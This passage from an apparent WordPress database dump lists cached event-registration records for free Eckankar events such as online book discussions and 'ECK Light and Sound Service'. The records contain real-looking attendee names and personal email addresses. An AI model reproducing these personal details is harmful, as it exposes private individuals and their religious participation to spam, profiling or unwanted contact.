Online\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1674383400:1674387000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1674383400;s:20:\"ticket_timestamp_end\";i:1674430200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438053,'ZAJ99074_cached','a:1:{i:0;a:24:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:24:\"Book Discussion - Online\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1674383400:1674387000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1674383400;s:20:\"ticket_timestamp_end\";i:1674430200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438054,'ENK36819_cached','a:1:{i:0;a:24:{s:5:\"email\";s:15:\"Lisa1lg@aol.com\";s:4:\"name\";s:9:\"Lisa Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:24:\"Book Discussion - Online\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1674383400:1674387000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1674383400;s:20:\"ticket_timestamp_end\";i:1674430200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438055,'OUJ15457_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"christo990@aol.com\";s:4:\"name\";s:10:\"Chris Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:24:\"Book Discussion - Online\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1674383400:1674387000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1674383400;s:20:\"ticket_timestamp_end\";i:1674430200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438056,'RCZ50342_cached','a:1:{i:0;a:24:{s:5:\"email\";s:27:\"alexareevesmassey@gmail.com\";s:4:\"name\";s:4:\"Lexi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:24:\"Book Discussion - Online\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1674383400:1674387000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1674383400;s:20:\"ticket_timestamp_end\";i:1674430200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438057,'KNF20107_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"nkemjikaugbaja@aol.com\";s:4:\"name\";s:12:\"Brown Ugbaja\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1673173800:1673177400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1673173800;s:20:\"ticket_timestamp_end\";i:1673220600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438058,'EFN27658_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"gai.lawson@icloud.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1673173800:1673177400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1673173800;s:20:\"ticket_timestamp_end\";i:1673220600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438059,'GPE25821_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"n.condon@yahoo.com\";s:4:\"name\";s:5:\"Nancy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1673173800:1673177400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1673173800;s:20:\"ticket_timestamp_end\";i:1673220600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438060,'DMP71445_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1673173800:1673177400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1673173800;s:20:\"ticket_timestamp_end\";i:1673220600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438061,'HUW88257_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"bjinlohi@gmail.com\";s:4:\"name\";s:9:\"BJ Wagner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1673173800:1673177400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1673173800;s:20:\"ticket_timestamp_end\";i:1673220600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438062,'NWT38307_cached','a:1:{i:0;a:24:{s:5:\"email\";s:27:\"alexareevesmassey@gmail.com\";s:4:\"name\";s:4:\"Lexi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1672569000:1672572600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1672569000;s:20:\"ticket_timestamp_end\";i:1672572600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438063,'SCQ96323_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"assika@guyerne.com\";s:4:\"name\";s:8:\"Guy-Erne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1671363900:1671368400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1671363900;s:20:\"ticket_timestamp_end\";i:1671368400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438064,'JSG10325_cached','a:1:{i:0;a:24:{s:5:\"email\";s:16:\"einwrm@gmail.com\";s:4:\"name\";s:12:\"Elijah Beard\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1671363900:1671368400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1671363900;s:20:\"ticket_timestamp_end\";i:1671368400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438065,'PWO99875_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1671363900:1671368400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1671363900;s:20:\"ticket_timestamp_end\";i:1671368400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438066,'JSW98977_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1671363900:1671368400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1671363900;s:20:\"ticket_timestamp_end\";i:1671368400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438067,'HPY63199_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1671363900:1671368400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1671363900;s:20:\"ticket_timestamp_end\";i:1671368400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438068,'KWF87636_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:24:\"Book Discussion - Online\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1671359400:1671363000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1671359400;s:20:\"ticket_timestamp_end\";i:1671406200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438069,'WZX17855_cached','a:1:{i:0;a:24:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:24:\"Book Discussion - Online\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1671359400:1671363000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1671359400;s:20:\"ticket_timestamp_end\";i:1671406200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438070,'CAP72345_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1670754600:1670758200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1670754600;s:20:\"ticket_timestamp_end\";i:1670801400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438071,'TMC76720_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"huuu4luv@xplornet.com\";s:4:\"name\";s:16:\"Marlene Chapelle\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1670754600:1670758200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1670754600;s:20:\"ticket_timestamp_end\";i:1670801400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438072,'LOW74542_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1670754600:1670758200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1670754600;s:20:\"ticket_timestamp_end\";i:1670801400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438073,'DZP26574_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1670754600:1670758200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1670754600;s:20:\"ticket_timestamp_end\";i:1670801400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438074,'TJO25322_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:45:\"Sandy(Tarzana San Fernando Valley California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1668948300:1668952800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1668944700;s:20:\"ticket_timestamp_end\";i:1668949200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438075,'EFA15402_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1668948300:1668952800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1668944700;s:20:\"ticket_timestamp_end\";i:1668949200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438076,'SMY83311_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1668948300:1668952800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1668944700;s:20:\"ticket_timestamp_end\";i:1668949200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438077,'YVC14670_cached','a:1:{i:0;a:24:{s:5:\"email\";s:24:\"inyear25252002@yahoo.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1668335400:1668382200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1668335400;s:20:\"ticket_timestamp_end\";i:1668382200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438078,'FDN78743_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"freedroger9@gmail.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1668335400:1668382200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1668335400;s:20:\"ticket_timestamp_end\";i:1668382200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438079,'XVA53791_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:32:\"Sandy(Tarzana/Encino California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound 